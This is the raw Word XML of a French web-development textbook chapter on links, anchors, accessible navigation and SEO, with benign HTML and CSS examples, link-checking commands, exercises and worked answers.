          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le libellé d'un lien doit être compréhensible hors contexte. « Cliquez ici » ne dit rien lorsqu'un lecteur d'écran liste les liens de la page. Préférez « Télécharger le rapport annuel 2026 ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 Ancres, fragments et retour en haut</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une ancre pointe vers un identifiant du document. Elle sert à construire un sommaire, à lier une section précise ou à revenir en haut de page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un sommaire interne et un retour en haut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&lt;nav aria-label="Sommaire"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;a href="#structure"&gt;Structure&lt;/a&gt; ·</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;a href="#semantique"&gt;Sémantique&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;/nav&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;h2 id="structure"&gt;Structure&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>&lt;h2 id="semantique"&gt;Sémantique&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>&lt;a href="#top"&gt;Revenir en haut&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le défilement vers l'ancre peut être adouci avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scroll-behavior: smooth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, à condition de respecter la préférence de réduction des animations :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un défilement doux qui respecte les préférences système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html { scroll-behavior: smooth; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (prefers-reduced-motion: reduce) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  html { scroll-behavior: auto; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'identifiant doit être unique, sans espace, et commencer par une lettre. Les accents sont autorisés en HTML5, mais évitez-les dans les ancres : ils compliquent les liens partagés et les copier-coller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.6 Liens et référencement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les moteurs de recherche suivent les liens pour découvrir les pages. Trois principes gouvernent cette exploration : la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>profondeur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nombre de clics depuis l'accueil), la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>stabilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> des URL et la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pertinence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> des libellés.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page importante ne devrait pas être à plus de trois clics de l'accueil.</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URL ne doit pas changer sans redirection 301 : sinon, le référencement acquis est perdu.</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lien doit décrire sa cible ; les libellés génériques diluent l'information.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lien cassé est une impasse pour l'utilisateur comme pour le robot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Détecter les liens cassés avant la mise en ligne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Vérifier les liens d'un site statique</w:t>
        <w:br/>
        <w:t>$ npx linkinator ./public --recurse --skip "mailto:.*"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ou avec un outil plus ancien</w:t>
        <w:br/>
        <w:t>$ wget --spider --recursive --no-parent https://exemple.fr</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TESTER UNE NAVIGATION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Parcourir tout le site au clavier, sans souris.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Vérifier que le focus est toujours visible.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Cliquer chaque lien du menu depuis au moins trois pages.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Tester avec la largeur d'un téléphone et le zoom à 200 %.</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Un lien se lit depuis le document qui le contient : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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Une navigation est une liste de liens dans un élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> nommé.</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aria-current="page"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique la page active et se style sans classe.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lien d'évitement est la première amélioration d'accessibilité à ajouter.</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target="_blank"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exige </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rel="noopener"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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libellé d'un lien doit être compréhensible hors contexte.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URL stables et les liens valides sont la base du référencement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les pages communiquent. Il reste à les habiller : images, vidéos et audio, avec les bonnes pratiques de poids et d'accessibilité.</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5.1 — Résoudre des chemins relatifs</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 xml:space="preserve">Voici une arborescence. Écrivez les liens demandés depuis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blog/2026/article.html</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 xml:space="preserve">Vers la page d'accueil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>index.html</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 xml:space="preserve">Vers l'image </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blog/2026/images/schema.png</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 xml:space="preserve">Vers la feuille </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>css/style.css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à la racine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vers l'ancre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la page courante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 5.2 — Construire une navigation accessible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Créez l'en-tête d'un site de trois pages : accueil, cours, contact.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Ajoutez un lien d'évitement en premier élément du body.</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 xml:space="preserve">Indiquez la page courante avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-current</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Ajoutez un libellé au menu et testez au clavier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 5.3 — Auditer les liens d'une page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ANALYSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Prenez une page de votre projet et vérifiez tous ses liens.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Listez les liens internes, externes, d'ancre et de contact.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Vérifiez chaque libellé hors contexte : est-il compréhensible seul ?</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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rel="noopener"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux liens en nouvel onglet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Corrigez au moins deux défauts.</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5.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>../../index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : deux remontées (2026, puis blog) avant d'atteindre la racine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>images/schema.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : le dossier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est un enfant du dossier courant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>../../css/style.css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : deux remontées puis descente dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : l'ancre seule suffit ; elle ne déclenche aucune requête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 5.2</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&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;a class="skip-link" href="#contenu"&gt;Aller au contenu&lt;/a&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;nav aria-label="Navigation principale"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;a href="index.html" aria-current="page"&gt;Accueil&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;a href="cours.html"&gt;Cours&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;a href="contact.html"&gt;Contact&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/nav&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;main id="contenu"&gt;...&lt;/main&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le lien d'évitement doit être le premier élément focusable du document. Il pointe vers l'identifiant du contenu principal, qui doit exister.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-current="page"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est annoncé par les lecteurs d'écran et ciblable en CSS. Au clavier, chaque lien reçoit un contour visible : ne supprimez jamais </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sans le remplacer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 5.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un tableau à quatre colonnes (type, cible, libellé, état) suffit pour l'audit. Les liens d'ancre doivent correspondre à un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> existant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un libellé comme « en savoir plus » est ambigu : il faut le compléter, par exemple « En savoir plus sur le cours HTML5 ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les liens externes sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>noopener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exposent la page d'origine à une manipulation via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>window.opener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. La correction est mécanique et sans effet visible.</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 xml:space="preserve">Depuis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blog/article.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, quel chemin mène à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> situé à la racine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index.html</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../index.html</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../../index.html</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/../index.html</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rel="noopener"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
